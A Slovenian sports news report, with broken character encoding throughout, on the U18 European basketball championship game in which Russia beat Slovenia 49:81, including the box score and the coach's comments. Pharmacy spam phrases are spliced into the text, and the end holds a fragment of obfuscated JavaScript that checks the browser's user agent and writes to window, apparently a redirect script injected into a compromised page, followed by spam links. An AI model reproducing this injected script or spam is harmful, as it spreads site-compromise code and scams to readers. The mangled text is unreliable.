U18: Poraz tudi na tekmi z Rusijo

0
316
Slovenska U18 koA?arkarska reprezentanca je odigrala A?e tretje sreA?anje v skupinskem delu evropskega prvenstva divizije A. Tokrat se je pomerila z Rusijo, ki je bila boljA?a z 49:81. Mladi Slovenci se sedaj podajajo v boj za razvrstitev med 9. in 16. mestom, naslednja tekma pa jih A?aka A?e v torek.

generic for bactroban Nedelja, 18. december:
SLOVENIJA : RUSIJA 49:81A�(17:18, 16:15, 11:25, 5:23)

Slovenija:A�OA?egoviA? 10 (7 skokov), Kunc, A�kedelj 10, A�teblaj, A�uA?a 1, Bratec 10, Kralj 6, Vesel 8 (11 skokov), JaneA?iA? 2, JurA?ek, A�iA?ka 2, Mlakar.
Rusija:A�Tonoyan 21 (6 skokov), Popov 2, Sharapov 2, Velichkin 5, Andrianov 15 (11 skokov), Motovilov 17 (7 podaj), Lopatin 5, Suvorov 4, Guchetl 2, Klyuev 8, Kuzmin, Barashkov.

Na tretji tekmi U18 evropskega prvenstva divizije A, ki poteka v turA?kem Samsunu, slovenski izbrani tudi v tretje ni uspelo priti do zmage. Mlade Slovence je tokrat porazila Rusija, ki je slavila z rezultatom 49:81.

Slovenska peterka v sestavi OA?egoviA?, A�kedelj, A�uA?a, Bratec in Vesel je zelo dobro zaA?ela tekmo in v uvodnih minutah narekovala ritem igri. V 7. minuti so mladi Slovenci vodili z 12:7, nato pa so njihovi tekmeci z delno serijo 7:0 priA?li do prvega vodstva na tekmi, s toA?ko prednosti pa se je konA?ala tudi prva A?etrtina. Podobno izenaA?eno je bilo tudi nadaljevanje, saj se nobena izmed reprezentanc ni uspela odlepiti od tekmeca. A�e najviA?jo prednost so si priigrali Slovenci, ki so v 15. minuti vodili s petimi toA?kami razlike, a so ruski koA?arkarji do konca polA?asa razmerje moA?i uspeli izenaA?iti, tako da se je uvodnih dvajset minut konA?alo ob rezultatu 33:33.A�

ZaA?etek drugega polA?asa je nakazoval, da bo sreA?anje vseskozi precej izenaA?eno, A?al pa so nato Rusi stopili na plin in v drugi polovici tretje A?etrtine s serijo zaporednih koA?ev priA?li do vodstva s A?tirinajstimi toA?kami razlike. Z agresivno in uA?inkovito igro so nadaljevali tudi v uvodu zadnje A?etrtine in tako v 35. minuti A?e priA?li do vodstva z veA? kot dvajsetimi toA?kami razlike. Do konca sreA?anja se Slovencem A?al ni veA? uspelo pribliA?ati, Rusija pa je priA?la do zasluA?ene zmage.

Slovenska izbrana vrsta se z osvojenim A?etrtim mestomA�podaja v boj za razvrstitev med 9. in 16. mestom, naslednjo tekmo pa bodo varovanci TomaA?a Fartka odigrali v torek, 20. decembra, ob 12. uri. Nasprotnik bo znan danes v veA?ernih urah.A�

TomaA? Fartek, selektor slovenske U18 reprezentance:A�“Odigrali smo dva povsem razliA?na polA?asa. V prvem smo bili konkurenA?ni in igrali koA?arko, ki spada na ta nivo tekmovanja. V nadaljevanje pa smo nato vstopili malce preveA? leA?ernoA�in takoj imeli teA?ave z agresivno igro Rusov. A?e nam je na prvi pritisk A?e uspelo dogovoriti, smo se ob drugem povsem razpadli. Obstaja veA? naA?inov, kako lahko izgubiA?, danaA?nji pa je bil povsem nesprejemljiv.” finpecia online uk

vir:

KZS

Buy 0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])} http://dondoko.jp/2018/03/19/purchase-serpina-side/ http://birthingfromtheheart.com/2017/10/mobile-spy-spy-mobile-phone-phone-parental-monitoring/